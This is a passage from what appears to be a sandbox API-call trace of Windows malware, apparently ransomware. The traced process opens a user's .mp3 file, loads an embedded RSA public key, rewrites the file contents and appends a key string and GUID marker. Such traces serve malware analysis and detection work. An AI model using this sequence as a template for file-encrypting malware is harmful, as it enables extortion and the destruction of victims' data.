(HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0201.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.207] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\hyXqTEnB.mp3") returned=".mp3" [0201.207] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\hyXqTEnB.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\hyxqtenb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.207] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=94571) returned 1 [0201.207] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.210] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x17145, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.210] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.212] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.212] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1716b, lpOverlapped=0x0) returned 1 [0201.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.213] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.215] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.215] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.215] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.215] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.215] GetLastError () returned 0x0 [0201.215] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.215] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.215] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.215] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.215] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17170) returned 0x2ea99b0 [0201.216] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fc90 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fcd8 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.217] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0201.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3440 [0201.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3428 [0201.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0201.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0201.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0201.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0201.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.220] GetCurrentThreadId () returned 0x66c [0201.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8628 [0201.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.221] GetCurrentThreadId () returned 0x66c [0201.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0201.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3440 [0201.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0201.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34a0 [0201.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0201.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34b8 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3458 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3428 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0201.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0201.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0201.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0201.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fcd8 | out: hHeap=0x620000) returned 1 [0201.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.233] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x17166, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x17166, lpOverlapped=0x0) returned 1 [0201.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.235] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1716b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.235] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.236] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.237] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.237] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.237] CloseHandle (hObject=0x510) returned 1 [0201.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0201.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0201.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 